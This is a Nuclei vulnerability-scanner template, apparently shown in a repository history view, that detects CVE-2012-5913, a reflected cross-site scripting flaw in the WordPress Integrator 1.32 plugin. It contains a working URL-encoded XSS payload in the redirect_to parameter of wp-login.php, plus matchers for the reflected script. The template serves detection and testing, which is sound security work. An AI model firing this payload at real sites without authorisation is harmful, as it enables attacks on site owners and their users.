nuclei-templates/cves/2012/CVE-2012-5913.yaml

31 lines
943 B
YAML
Raw Normal View History

2021-07-13 17:15:23 +00:00
id: CVE-2012-5913
info:
name: WordPress Integrator 1.32 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
2021-07-14 13:38:13 +00:00
description: Cross-site scripting (XSS) vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php.
2021-07-13 17:15:23 +00:00
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-5913
tags: cve,cve2012,wordpress,xss,wp-plugin
requests:
- method: GET
path:
2021-07-19 05:35:03 +00:00
- '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E'
2021-07-13 17:15:23 +00:00
matchers-condition: and
matchers:
- type: word
words:
2021-07-19 05:35:03 +00:00
- "</sCripT><sCripT>alert(document.domain)</sCripT>"
2021-07-13 17:15:23 +00:00
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200